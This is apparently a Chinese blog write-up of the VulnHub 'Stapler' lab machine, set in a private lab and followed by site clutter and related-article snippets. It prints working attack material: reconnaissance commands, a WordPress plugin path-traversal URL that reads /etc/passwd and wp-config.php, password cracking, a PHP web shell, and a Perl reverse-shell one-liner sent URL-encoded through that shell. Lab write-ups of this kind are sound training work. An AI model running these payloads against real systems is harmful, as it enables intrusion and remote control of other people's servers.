vulhub-Stapler

最新推荐文章于 2025-05-13 17:05:11 发布
最新推荐文章于 2025-05-13 17:05:11 发布
阅读量437 收藏 7
点赞数 9
分类专栏: vulhub靶场复现 文章标签: android php 开发语言 安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62717550/article/details/147900235
版权

主机探测

└─# arp-scan -l

端口探测

└─# nmap -p- -A 192.168.200.130

目录扫描

└─# dirsearch -u http://192.168.200.130/

21 ftp 管理端口 (可以匿名访问)

get命令下载文件

查看文件内容

扫描Samba服务器

└─# enum4linux -a 192.168.200.130

通过smbclient访问共享目录

smbclient //192.168.200.130/kathy

通过smbclient访问共享目录

smbclient //192.168.200.130/tmp

访问12380端口

nikto扫描发现网站使用ssl,同时发现几个目录/phpmyadmin/ 、/admin112233/等

└─# nikto -h 192.168.200.130 -p 12380

访问https://

访问/phpmyadmin/目录

访问blogblog/目录,发现(CMS)WordPress

使用wpscan扫描

wpscan --url https://192.168.200.130:12380/blogblog/ --disable-tls-checks

发现advanced video模块

searchsploit查一下有没有可以利用的payload

└─# searchsploit advanced video

分析python编写的payload

└─# searchsploit -m exploits/php/webapps/39646.py

└─# vim /usr/share/exploitdb/exploits/php/webapps/39646.py

poc:http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

依据poc,构造一个url

https://192.168.200.130:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../../../../../../../../../etc/passwd

返回个url

访问url

下载jpeg文件

wget --no-check-certificate https://192.168.200.130:12380/blogblog/wp-content/uploads/143450359.jpeg

本地查看

https://192.168.200.130:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php

下载jpeg文件

wget --no-check-certificate https://192.168.200.130:12380/blogblog/wp-content/uploads/2002494408.jpeg

└─# cat 2002494408.jpeg

得到mysql账号密码等信息

root/plbkac

登录mysql

mysql -h 192.168.200.130 -u root -p plbkac

使用john工具对user_pass进行解密

└─# john password.txt --wordlist=/usr/share/wordlists/rockyou.txt
└─# john --show password.txt

登录

jhon/incorrect

上传木马文件

GIF89a
<?php
system($_GET['132']);
phpinfo();
?>

访问

└─# weevely https://192.168.200.130:12380/blogblog/wp-content/uploads/muma.php test

https://192.168.200.130:12380/blogblog/wp-content/uploads/muma.php_.php?132=id

反弹shell生成器

perl -e 'use Socket;$i="192.168.200.130";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
​


https://192.168.200.130:12380/blogblog/wp-content/uploads/muma.php_.php?132=70%65%72%6c%20%2d%65%20%27%75%73%65%20%53%6f%63%6b%65%74%3b%24%69%3d%22%31%39%32%2e%31%36%38%2e%32%30%30%2e%31%33%30%22%3b%24%70%3d%39%39%39%39%3b%73%6f%63%6b%65%74%28%53%2c%50%46%5f%49%4e%45%54%2c%53%4f%43%4b%5f%53%54%52%45%41%4d%2c%67%65%74%70%72%6f%74%6f%62%79%6e%61%6d%65%28%22%74%63%70%22%29%29%3b%69%66%28%63%6f%6e%6e%65%63%74%28%53%2c%73%6f%63%6b%61%64%64%72%5f%69%6e%28%24%70%2c%69%6e%65%74%5f%61%74%6f%6e%28%24%69%29%29%29%29%7b%6f%70%65%6e%28%53%54%44%49%4e%2c%22%3e%26%53%22%29%3b%6f%70%65%6e%28%53%54%44%4f%55%54%2c%22%3e%26%53%22%29%3b%6f%70%65%6e%28%53%54%44%45%52%52%2c%22%3e%26%53%22%29%3b%65%78%65%63%28%22%73%68%20%2d%69%22%29%3b%7d%3b%27

​

mysql写入一句话木马

Jenkins远程命令执行漏洞(CVE-2018-1000861复现)
墨痕诉清风的博客
11-06 2355
其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。(1) 下载vulhub项目,然后进入到 vulhub/jenkins/CVE-2018-1000861目录下。(3).然后在我们接收shell的机器上监听之前写的端口。...
【jenkins漏洞复现】CVE-2017-1000353远程代码执行漏洞+CVE-2018-1000861未授权弱口令用户可执行任意命令
serendipity1130的博客
08-31 1040
CVE-2017-1000353 1.扫描开放了8080端口,访问8080端口: 2、执行下面命令,生成字节码文件: java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" 3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令 4、修改exploit.py,把proxies里面的内容注释掉 6、执行如下
【打靶记录】VulnHub-stapler靶机渗透wp
qq_39972370的博客
02-12 1368
这是一个适合初学者到中级水平的虚拟机。它有一些挑战,但不会过于复杂。至少有两条路径可以获得一个有限权限的shell。至少有三种方法可以获得root权限。
2024年最全【打靶记录】VulnHub-stapler靶机渗透wp,2024年最新学习指南
2401_84519960的博客
05-11 878
这是一个适合初学者到中级水平的虚拟机。它有一些挑战,但不会过于复杂。至少有两条路径可以获得一个有限权限的shell。至少有三种方法可以获得root权限。攻击机:Kali Linux IP:192.168.47.129目标:获得root权限且找到flag.txt。
2021年1月16日-Vunlhub-Stapler 1渗透学习
AnonyMousIT的博客
01-16 509
2021年1月16日-Vunlhub-Stapler: 1渗透学习 一、简介 靶机地址:https://www.vulnhub.com/entry/stapler-1,150/ kali地址:192.168.56.105 靶机IP地址:192.068.56.104 使用了nmap,nikto,wpscan,smbclient,john,weelvely 二、心路历程 开放的端口挺多的,首先尝试使用ftp匿名登录 可以登录成功,并发现了note文件,将其下载到本地查看 note文件中发现两个用户名,
Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)
m0_68117643的博客
08-01 1982
该靶机(stapler:1)直接导入Vmware无法使用,可先使用VirtualBox打开后再导出虚拟机,使用Vmware打开即可。 思路:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权......
vulnhub靶机:Stapler
bilala的博客
03-11 2105
0x01 靶机安装 难度定位:简单(https://github.com/Ignitetechnologies/CTF-Difficulty 靶机介绍:https://www.vulnhub.com/entry/stapler-1,150/ –> 作者说至少有两种方法拿到普通权限shell,至少三种方法拿到root权限 <– ❕❕在导入靶机到VMware时会跳出这个报错(不知道导VirtualBOX会不会报 解决方法:编辑Stapler.ovf文件,将文档中所有的Caption替换为Eleme
【漏洞复现】Jenkins远程命令执行漏洞(CVE-2018-1000861)
weixin_43486390的博客
12-21 3036
0x01 漏洞介绍 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 0x02 影响版本
【甄选靶场】Vulnhub百个项目渗透——项目十:stapler-1(文件上传,多方式提权)
人间体佐菲的博客
09-06 1088
网络安全,渗透测试,网络空间安全
Jenkins远程命令执行漏洞(CVE-2018-1000861)
黑白的博客
12-07 2931
声明 好好学习,天天向上 漏洞描述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 影
Jenkins远程命令执行漏洞
m0_48520508的博客
12-23 573
0x00简介 Jenkins自动化部署可以解决集成、测试、部署等重复性的工作,工具集成的效率明显高于人工操作;并且持续集成可以更早的获取代码变更的信息,从而更早的进入测试阶段,更早的发现问题,这样解决问题的成本就会显著下降:持续集成缩短了从开发、集成、测试、部署各个环节的时间,从而也就缩短了中间出现的等待时间;持续集成也意味着开发、集成、测试、部署得以持续。 0x01漏洞概述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者
如何查看项目是否支持最新 Android 16K Page Size 一文汇总
恋猫de小郭的博客
05-12 805
也就是 64K 对齐,属于 16K 的 4倍,那「理论上」应该是对齐的,但是跑在 16K 上会 crash ,不过 crash 提示也不是 so 不对齐,而是在某段代码执行时出现 crash,并且你定位到的地址代码会很奇葩。测试环境可以使用模拟器,一般适配 16 KB 的就是 arm64 ,所以 x86_64 模拟器基本没用,而且需要。是 65536 ,那就是64K 对齐,属于 16K 的 4倍,那「理论上」应该是对齐的。最后,你还可以在 Android Studio 里运行你的 App,然后。
MySQL 8.0安装(压缩包方式)
微信公众号: 后端码匠
05-12 318
本文详细介绍了如何在Windows系统上通过压缩包方式安装MySQL 8.0。首先,从官网下载并解压MySQL安装包。接着,确保系统中没有其他MySQL版本残留,并使用管理员权限的CMD删除旧服务。然后,切换到解压目录的bin文件夹,执行初始化命令生成临时密码,并安装MySQL服务。启动MySQL后,使用临时密码登录并修改密码。最后,配置系统环境变量和my.ini文件,以完成MySQL的安装和初始化设置。
android抓包踩坑记录
weixin_41249051的博客
05-13 102
​ 由于需要公司业务需求,需要抓取APP中摄像机插件的网络包,踩了两天坑,这里做个总结吧。
文件包含2
Sean_summer的博客
05-10 822
根据这两个例子的对比就可以看到其实二者从源代码其实是很难分辨出来,但是对于传入的payload却是有所不同的。【这个代码对参数进行了处理,即在参数后面增加了一个.php的后缀,这就是将任何参数都转为了一个php文件】比如这里就是将php://输入流的所有内容读取为字符串,来确保strlen()函数的实现。那么我们的payload就应该是前面有长度为800的字符,然后再输入我们的php伪协议。这里看到直接告诉了flag的位置, 那么就猜测是一个 本地文件包含。得到的编码进行base64解码就可以了。
Android NDK版本迭代与FFmpeg交叉编译完全指南
健健的博客
05-08 1258
本文深入探讨了在Android开发中使用NDK进行原生代码开发,特别是集成FFmpeg多媒体处理库的关键步骤。文章首先分析了Android NDK的版本迭代,从NDK r23及之前版本到NDK r25+版本的新特性,详细介绍了各版本的特点和变更。接着,文章重点讲解了FFmpeg交叉编译的注意事项,包括版本匹配原则、API级别选择策略、工具链选择指南和输出命名规范。此外,文章提供了完整的编译脚本示例,分别针对高版本NDK(r21+)和低版本NDK(r16-r20)的ARM64和ARMv7架构。最后,文章总结了
Android framework功能配置开发
05-09 246
触摸屏声音开关, 默认锁屏开关,设置
香橙派zero3 安卓TV12,更换桌面launcher,开机自启动kodi
m0_46133013的博客
05-13 71
禁用原桌面com.android.tv.launcher,已经安装了projectivylauncher434.apk桌面。还安装了kodi软件。禁用原桌面以后,自动切换到了新桌面,然后选择kodi,长按OK,打开开发者模式,连击版本号,基本上都是这样。或者启动别的什么软件。
Android设备是否满足硬件要求
最新发布
唐诺
05-13 93
【代码】Android设备是否满足硬件要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

IT-sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值